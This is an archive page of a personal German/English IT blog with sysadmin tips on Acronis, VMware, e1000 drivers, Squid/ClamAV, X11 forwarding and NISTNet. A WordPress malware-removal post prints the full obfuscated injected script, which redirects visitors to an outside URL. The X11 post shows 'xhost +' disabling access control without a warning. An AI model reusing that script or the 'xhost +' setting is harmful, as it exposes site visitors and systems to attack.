Archive

Archive for the ‘it’ Category

Convert TIB to VMDK – Invalid Arguments/Parameters

October 12th, 2008 juergens No comments

With Acronis True Image Echo Server, you can convert your tib-Image to a virtual Harddisk Image for several
virtualization products. E.g. VMware (WS, Player, Server, ESX), Parallels, XEN oder Microsofts Virtual Server.

It seems there is a bug in an older version (8.0xx) which causes an error if you want to convert to a “VMware”
(not ESX) image. You will get:

Module 60
Code 1(0×3C001) Invalid Arguments

If you want to convert your tib into an ESX image, it will create a non-growing vmdk file. This means you get an
mage which is as big as your Partitions are.

Solution:
Update your ATI Echo Server! You can get the download at the Acronis portal with your personal login. Doing a
conversion with build 8.163 didn’t cause the “Invalid Arguments” error.

PS: You can convert the acronis images with vmware converter, too! BUT (with Converter Version 3.0.3) only
until Acronis True Image 9.1! Newer Versions are not supported, yet.

Categories: it Tags:

Wordpress und HTML/Crypted.Gen

July 24th, 2008 juergens 3 comments

Antivir meldet eine HTML Malware: HTML/Crypted.Gen

Unternehmt folgende Schritte um ihn zu entfernen:

• auf dem FTP Server in folgendes Verzeichnis wechseln: /wp-content/themes/-dein-theme-/

• dort die Datei header.php öffnen

• folgender Inhalt muss gelöscht werden:

<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!62!32!119!105!110!100!111!119!46!108!111!99!97!116!105!111!110!61!34!104!116!116!112!58!47!47!120!114!108!46!117!115!47!107!107!51!119!54!34!32!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>

• Datei wieder hochladen und der Virus ist verbannt

Categories: it Tags:

MPEG um 90°/180° drehen

July 15th, 2008 juergens No comments

Wieder mal mit der Digitalkamera hochkant gefilmt? Kein Problem für VirtualDub

1. VirtualDub besorgen:  Download

2. Film öffnen

3. Filter, Add, rotate, Richtung und Grad wählen

3. Video, Compression: MPEG-4 wählen

4. Video, Full Processing mode

5. Audio,  Source Audio

6. File, Save as AVI

Und schon braucht man den Kopf nicht mehr verrenken.

PS: mit dem Filter rotate2 ist es auch möglich beliebige Grad einzustellen.

Categories: it Tags:

Failed to retrieve disk information for disk.vmdk

June 30th, 2008 juergens No comments

Beim Kopieren von VMware Disks, Umbenennen und Einbinden derer in eine neue VM tritt folgender Fehler auf:

Failed to retrieve disk information for disk.vmdk

Es muss nun die disk.vmdk geöffnet und angepasst werden.

Die entsprechenden alten Dateinamen (alt-s001.vmdk, alt-s001.vmdk) auf die neuen (neu-s001.vmdk, …) umstellen.

Categories: it Tags:

Detected Tx Unit Hang

February 10th, 2008 juergens 5 comments
e1000: eth1: e1000_clean_tx_irq: Detected Tx Unit Hang
Tx Queue             <0>
TDH                  <91>
TDT                  <a3>
next_to_use          <a3>
next_to_clean        <90>
buffer_info[next_to_clean]
time_stamp           <33a0d>
next_to_watch        <96>
jiffies              <33f8f>
next_to_watch.status <0>
NETDEV WATCHDOG: eth1: transmit timed out
e1000: eth1: e1000_watchdog: NIC Link is Up 1000 Mbps Full Duplex

Dieser Fehler trat bei starker Netzwerklast auf und verursachte regelmäßige Verbindungsabbrüche.
Nach etwas Recherche fand ich eine Lösung die das Problem beheben sollte:

http://e1000.sourceforge.net/

Leider nicht in meinem Falle, da es nur bei 82573(V|E|L) half.
Auch das deaktivieren von TSO mit ‘ethtool -k eth1 tso off’ brachte nichts.

Mein Chipsatz dagegen (Supermicro Board):

# lspci
04:00.0 Ethernet controller: Intel Corporation 631xESB/632xESB DPT LAN Controller SERDES (rev 01)

Der Chip laut Produktbeschreibung: 82563EB

Da im Debian Kernel 2.6.18-6 nur ein älterer Intel e1000 Treiber ist, machte ich mich also an ein Update.
Treiber runtergeladen: http://downloadcenter.intel.com/
Kernel-Header gezogen:

# apt-get install linux-headers-2.6.18-6-686

verlinkt:

# ln -s /usr/src/linux-headers-2.6.18-6-686 /usr/src/linux

Treiber entpackt und kompilliert:

# tar -zxf  e1000-7.6.15.tar.gz
# cd e1000-7.6.15/src
# make install

Ob es erfolgreich war, kann man gleich prüfen:

# rmmod e1000;modprobe e1000

nun sollte die neue Version aktiv sein:

# ethtool -i eth1
driver: e1000
version: 7.6.15-NAPI

Damit er den Treiber auch beim Booten läd, baut man ihn noch in die initrd ein:

# nano /etc/initramfs-tools/modules
e1000
# update-initramfs -v -u -k all

baut die neue Ramdisk. Nun wird der Treiber gleich beim booten aktiviert.

Habe nun etwa 1TB mit durchschnittlich 95MB/s über das Interface bekommen, ohne einen einzigen Aussetzer.

Categories: it Tags:

Squid + ClamAV via ICAP unter Debian

August 7th, 2007 juergens 2 comments

Der folgende Beitrag beschreibt die Installation eines Web Proxy inklusive Virenscan. Benutzt wurde hierzu wiederum nur freie Software. Als Proxy Squid, als Virenscanner ClamAV mit freshclam als Signaturupdater und c_icap zur Verbindung der beiden Prozesse. Das ganze lässt sich zwar auch über einen ClamAV Redirector lösen, ist jedoch um einiges langsamer.

Man findet im Internet ziemlich wenig über die Anbindung von Squid an ClamAV. Die Informationen verweisen auf Komplettpakete wie z.B. Dansguardian. Über c_icap findet man wiederum fast ausschließlich russische Foren, welche etwaige Probleme behandeln.

Ich verwende ein Debian etch 4.0 System, welches mittels der netinst CD hochgezogen wurde. Es sind ausschließlich die Pakete des “Standard-Systems” installiert. Weder Desktop Umgebung noch etwaige Server Applikationen sind vorhanden. Die Umgebung läuft in einer VMware, was aber in unserem Fall keinen Unterschied zu einem eigenständigen physikalischen System bringt.

uname -a
Linux etchy 2.6.18-4-486 #1 Mon Mar 26 16:39:10 UTC 2007 i686 GNU/Linux

Zuerst brauchen wir natürlich SSH Zugang

 apt-get install openssh-server

Nun installieren wir Squid

apt-get install squid
Paketlisten werden gelesen... Fertig
Abhängigkeitsbaum wird aufgebaut... Fertig
Die folgenden zusätzlichen Pakete werden installiert:
squid-common
Vorgeschlagene Pakete:
squidclient squid-cgi logcheck-database resolvconf smbclient
Die folgenden NEUEN Pakete werden installiert:
squid squid-common
0 aktualisiert, 2 neu installiert, 0 zu entfernen und 1 nicht aktualisiert.
Es müssen 1093kB Archive geholt werden.
Nach dem Auspacken werden 6607kB Plattenplatz zusätzlich benutzt.
Möchten Sie fortfahren [J/n]? j
Hole:1 http://ftp.de.debian.org etch/main squid-common 2.6.5-6 [438kB]
Hole:2 http://ftp.de.debian.org etch/main squid 2.6.5-6 [654kB]
Es wurden 1093kB in 4s geholt (225kB/s)
Vorkonfiguration der Pakete ...
Wähle vormals abgewähltes Paket squid-common.
(Lese Datenbank ... 20009 Dateien und Verzeichnisse sind derzeit installiert.)
Entpacke squid-common (aus .../squid-common_2.6.5-6_all.deb) ...
Wähle vormals abgewähltes Paket squid.
Entpacke squid (aus .../squid_2.6.5-6_i386.deb) ...
Richte squid-common ein (2.6.5-6) ...
Richte squid ein (2.6.5-6) ...
Creating squid spool directory structure
2007/08/07 19:02:45| Creating Swap Directories
Restarting Squid HTTP proxy: squid.

etchy:~#

Squid muss nun konfiguriert werden, anbei eine minimale Beispielkonfiguration. Man muss nur “acl trusted” durch das eigene Netzwerk ersetzen. Anschließend wird Squid neu geladen

/etc/init.d/squid reload

Nun kann man den Proxy auch schon testen, IP und Port im Browser eintragen und es sollte schon funktionieren.

Installation des Virenscanners ClamAV

apt-get install clamav

Alle empfohlenen Abhängigkeiten werden mitinstalliert.

Installation der ICAP Schnittstelle c_icap

Hier gibt es immer die aktuelle Version: http://sourceforge.net/projects/c-icap
Entweder direkt mit wget herunterladen oder mittels WinSCP übertragen.

wget http://belnet.dl.sourceforge.net/sourceforge/c-icap/c_icap-180407.tar.gz

Entpacken & Installieren

tar xfz c_icap-VERSION.tar.gz
cd c_icap-VERSION
./configure --enable-static --with-clamav --prefix=/usr/local/icap
make
make install

Konfiguration von c_icap
/usr/local/icap/etc/c-icap.conf
man ändert “User wwwrun” zu “User proxy” und fügt am Ende der Config folgende Zeilen ein:

acl localsquid_respmod src 127.0.0.1 type respmod
acl localsquid src 127.0.0.1
acl externalnet src 0.0.0.0/0.0.0.0
icap_access allow localsquid_respmod
icap_access allow localsquid
icap_access deny externalnet

Wenn Squid auf einem anderen Server läuft, muss hier die IP Adresse angepasst werden.

Nun wird überprüft ob alles erfolgreich war

 

Konfiguration Squid & c_ICAP

Damit Squid seine Daten zum Virenscanner schickt, muss man ihm das vorher natürlich beibringen.

————— Fortsetzung folgt ——————

Folgende Meldungen können auftreten:

beim configure von c_icap

configure: error: no acceptable C compiler found in $PATH

Es muss ein C Compiler inkl. Abhängigkeiten installiert werden:

apt-get install gcc
inklusiv Abhängigkeiten

checking for C compiler default output file name… configure: error: C compiler cannot create executables
G++ inkl. Abhängigkeiten installieren

apt-get install g++
-bash: make: command not found

make inkl. Abhängigkeiten installieren

apt-get install make

bei make von c_icap

srv_clamav.c:27:20: error: clamav.h: No such file or directory
srv_clamav.c:121: error: invalid use of undefined type 'struct cl_limits'

clam Antivirus library development files müssen installiert werden

apt-get install libclamav-dev

bei make install von c_icap

chgrp nobody /usr/local/icap/var/log/
chgrp: ungültige Gruppe nobody

Gruppe nobody anlegen und make install erneut ausführen

groupadd nobody
make install
Categories: it Tags:

Backspace und Firefox

July 17th, 2007 juergens No comments

Wer die Backspace – Funktionalität im Firefox bei Ubuntu vermisst hilft sicherlich folgender Beitrag:

Firefox öffnen, als URL folgendes eingeben:

about:config

und bei browser.backspace_action den Wert von 1 auf 0 ändern.

Categories: it Tags:

X11 Forwarding with Windows & Putty

April 1st, 2007 juergens 7 comments

Ja, ich muss zugeben, ich bin zum Großteil eigentlich ein Windows Benutzer. Ich hoffe die Anwendungen, mit welchen ich gerne arbeite, werden irgendwann mal unter Linux arbeiten denn momentan ist das leider noch nicht ganz der Fall.

Deshalb brauch ich eine Möglichkeit grafisch basierende Anwendungen vom Linux/Ubuntu Desktop auf meinen Windows XP Desktop zu übertragen.

Zuerst benötigt man einen XServer für Windows. Auf der Suche nach einer _wirklich_ kostenlosen Version bin ich nach längerer Suche bei Xming hängen geblieben. Dieser absolut einfach zu installieren und tut einfach das was er soll, x11 Forwarding.
Offizielle Xming Homepage: Xming
Download von Xming: Sourceforge

Die Installation kann default erfolgen, es sind keine besonderen Anpassungen notwendig.

Nun wird per Startmenü Xming gestartet.
Es erscheint das entsprechende Symbol in der Trayleiste und der XServer läuft nun auch schon.

Am Remote Server muss neben einem laufendem SSH Server auch erlaubt werden, dass man remote auf den XServer zugegreifen kann. Dies erfolgt über den Befehl xhost.
Man kann steuern welche Hosts verbinden dürfen oder man kann alle erlauben.
Hostbeschränkung hinzufügen oder entfernen (Achtung, Auflösung erfolgt über DNS oder /etc/hosts)

root@emunet:~# xhost + <em>hostname</em>
<em>hostname</em> being added to access control list
root@emunet:~# xhost - <em>hostname</em>
<em>hostname</em> being removed from access control list

Ohne Hostbeschränkung

root@emunet:~# xhost +
access control disabled, clients can connect from any host
root@emunet:~# xhost -
access control enabled, only authorized clients can connect

Nun kann man mit einem X11 forwardfähigem SSH Client zum Remoteserver verbinden, beispielsweise Putty.
Neben der IP Adresse setzen wir unter Connection/SSH/X11 (bei älteren Versionen Connection/SSH/Tunnels) den Haken bei Enable X11 forwarding.

Nach dem Login kann man nun die gewünschte X Anwendung starten, z.B.

root@emunet:~# xeyes
root@emunet:~# xclock

Oder um gleich Bezug zum letzten Artikel zu nehmen,

root@emunet:~#/usr/X11R6/bin/xnistnet

Putty erlaubt es auch, beim Verbinden einen Usernamen und die Anwendung samt Pfad mit zu schicken. Somit muss man nur noch sein Passwort eingeben und die entsprechende Anwendung startet direkt.
Username: Connection/Data/Auto-Login Username
Anwendung: Connection/SSH/Remote command

Im nächsten Artikel geht es dann um eine Passwortlose Authentifizierung mit Putty, also Windows gegen Linux, sowie Linux untereinander.

Gruß Jürgen

Categories: it Tags:

cnistnet & xnistnet

March 30th, 2007 juergens No comments

Nun will ich kurz erläutern wie man denn nun sein frisch installiertes NISTNet benutzen kann. Es gibt zwei Möglichkeiten der Konfiguration

  • Mausschubsermethode
  • Männermethode

Ich geh eigentlich nur auf die zweitere ein, da sich daraus die GUI selbst erklärt.

cnistnet

root@juergens-desktop:~# cnistnet
<ol>
	<li>
<ol>[--delay delay [delsigma[/delcorr]]]
[--drop  drop_percentage[/drop_correlation]]
[--dup  dup_percentage[/dup_correlation]]
[--bandwidth bandwidth]
[--drd drdmin drdmax [drdcongest]]</ol>
</li>
Usage: cnistnet &lt;options&gt; - must be root to run it.
-u                      up (on)
-d                      down (off)
-a src[:port[.protocol]] dest[:port[.prot]] [cos] add new-r src[:port[.prot]] dest[:port[.prot]] [cos]          remove
-s src[:port[.prot]] dest[:port[.prot]] [cos]          see stats
-S src[:port[.prot]] dest[:port[.prot]] [cos]          see stats continuously
[-n] -R                 read table (-n numerical format)
-D value                debug on (value=1 minimal, 9 maximal)
-U                      debug off
-G                      global stats
-K                      kickstart the clock
-F                      flush the queues
-h                      this help message</ol>
root@juergens-desktop:~#

Hinzufügen einer neuen Policy

Alles was von der 192.168.1.10 an die 192.168.11 geschickt wird, bekommt eine 10ms delay/latency. Zusätzlich wird die eingehende Bandbreite (zum Nistnetrouter) auf 120kBytes/s beschränkt.

cnistnet -a 192.168.1.10 192.168.1.11 add new --delay 10 --bandwidth 120000

Abfragen aktiver Policies

Folgendermaßen kann man abfragen welche Policies aktiv sind (Achtung, diese Abfrage kann etwas dauern, da NISTNet immer versucht Namen in IP-Adressen und umgekehrt aufzulösen. Wenn man nicht waren möchte, muss sichergestellt sein, dass der Nameserver richtig konfiguriert ist.)

cnistnet -R
<ol>cnistnet -a 192.168.1.10 192.168.1.11 --delay 10.000
cnistnet -a 192.168.1.10 192.168.1.11 --bandwidth 120000</ol>

Überprüfen ob eine Policy greift, geht mit dem Statistiktool recht leicht

cnistnet -s #Einmal-Stats
cnistnet -S #Live-Stats

Löschen einer Policy

cnistnet -r 192.168.1.10 192.168.1.11

Das soll es dann auch schon gewesen sein, detailliertere Informationen bekommt man z.B. auch per man nistnet.
Bei der GUI /usr/X11R6/bin/xnistnet sollte man beachten, dass auch hier eine DNS Abfrage aller Einträge durchgeführt wird. In dieser Zeit reagiert das Frontend nicht.

Categories: it Tags:

Howto install NISTNet on Ubuntu / Debian

March 30th, 2007 juergens 1 comment

Nistnet ist ein freier Netzwerk Emulator, welcher Bandbreitenbeschränkung, Latenz, Packet Drop, DUPs, uvm. unterstützt.
Hier gibts genauere Infos: NISTNet

Im folgenden geht es darum, NISTNet unter Ubuntu zu kompilieren und zu konfigurieren.
Mein Grundsystem dafür war ein frisch installiertes KUbuntu der Version 6.06 und dem 2.6.15er Kernel.

Als allererstes schalte ich den root Benutzer frei um mir die sudos zu sparen.

sudo passwd
# Enter new Root Password

Dann brauchen wir die Kernelsources womit wir dann einen Kernel bauen können.

apt-get install linux-source-2.6.15
cd /usr/src
tar -xjf linux-source-2.6.15.tar.bz2
ln -sf linux-sources-2.6.15 linux
apt-get install kernel-package libncurses5-dev
cd /usr/src/linux
make oldconfig
make-kpkg -initrd kernel-image
cd /usr/src
dpkg -i kernel-image-2.6.15.7-ubuntu1_10.00.Custom_i386.deb

Beste Zeit für einen Reboot mit unserem neuen Kernel.

Desweiteren sind noch einige Pakete zum kompilieren notwendig

apt-get install xlibs-dev
apt-get install libxaw-headers
apt-get install libxaw7-dev
apt-get install xaw3dg-dev
apt-get install qt3-doc qt3-dev-tools qt3-apps-dev
apt-get install lsb-cxx

Runterladen des eigentlichen Tools auf der NISTNet Homepage
http://www-x.antd.nist.gov/nistnet/requestform.html
Land auswählen und “Submit Request”. Es wird die 2.0.12c benötigt (für 2.6.xx Kernels)

entpacken

tar -vzxf nistnet.2.0.12c.tar.gz

Damit knistnet.c nicht die folgenden Errors bringt

knistnet.c:916: error: too few arguments to function ippt-&gt;func
knistnet.c:961: error: too few arguments to function ippt-&gt;func
knistnet.c:972: error: too few arguments to function ippt-&gt;func
knistnet.c:1003: error: too few arguments to function ippt-&gt;func

Muss man in kernel/knistnet.c ein zusätzliches Argument bei jedem Eintrag hinzufügen

return ippt-&gt;func(skb, dev, ippt<u><em><strong>, dev</strong></em></u>);

Damit folgender Fehler ausbleibt

make[1]: Entering directory `/lib/modules/2.6.15-23-386/build'
make[1]: ** No rule to make target `modules'.  Stop.
make[1]: Leaving directory `/lib/modules/2.6.15-23-386/build'
make: ** [modules] Fehler

fügt man noch einen Verzeichnislink auf die Sourcen ein

rm /lib/modules/2.6.15-23-386/build
ln -s /usr/src/linux-source-2.6.15 /lib/modules/2.6.15-23-386/build

Und los gehts, alles sollte nun fehlerfrei durchlaufen

./configure
make
make install

Leider findet er nach dem ersten Startversuch das Modul nicht,
deshalb muss man ihm hier etwas unter die Arme greifen. Der Datei /lib/moduls/2.6.15.7-ubuntu1/modules.dep fügen wir am Ende einen neuen Eintrag hinzu

/lib/modules/2.6.15.7-ubuntu1/extra/nistnet.ko:

Nach einem Aufruf von ./Load.Nistnet sollte nun das nistnet Modul geladen werden

#tries to remove rtc module
nistnet module installed successfully

Unserem Router müssen wir noch beibringen, Pakete zu routen.
Dies geschieht folgendermaßen

echo 1 &gt;/proc/sys/net/ipv4/ip_forward

Damit diese Einstellung nach einem Neustart nicht verschwindet hinterlegen wir sie in:

# File: /etc/sysctl.conf
net/ipv4/ip_forward=1

Es ist auch nützlich sich im Grub Bootloader den neuen Kernel an die erste Stelle zu schieben, sonst bootet der falsche und das Tool arbeitet nicht mehr. Also einfach in der /boot/grub/menu.lst den entsprechenden Eintrag nach oben schieben und abspeichern.

Nun haben wir die Installation auch schon geschafft! Der nächste Artikel beschreibt kurz die Benutzung von cnistnet und xnistnet.

Sollte bei cnistnet -u einer der folgenden Fehler auftreten

globalstatnistnet: No such file or directory
util_binaddnistnet: No such file or directory
Error adding 192.168.0.1 -&gt; 192.168.10.1: addnistnet: Illegal seek
o.ä.

muss man die virtuellen Devices manuell hinzufügen

mknod /dev/hitbox c 62 0
mknod /dev/nistnet c 62 1
chown root /dev/hitbox
chown root /dev/nistnet
mknod /dev/mungebox c 63 0
chown root /dev/mungebox
mknod /dev/spybox c 64 0
chown root /dev/spybox
modprobe nistnet

Dies passiert z.B. nach einem Reboot, nachdem das Tool installiert wurde oder wenn man das Modul nicht geladen hat.

Hier ein paar Links welche mir sehr hilfreich waren:
Debianforum: “No rule to make target `modules’. Stop.”
Howto: Install NISTNet on Ubuntu

Categories: it Tags: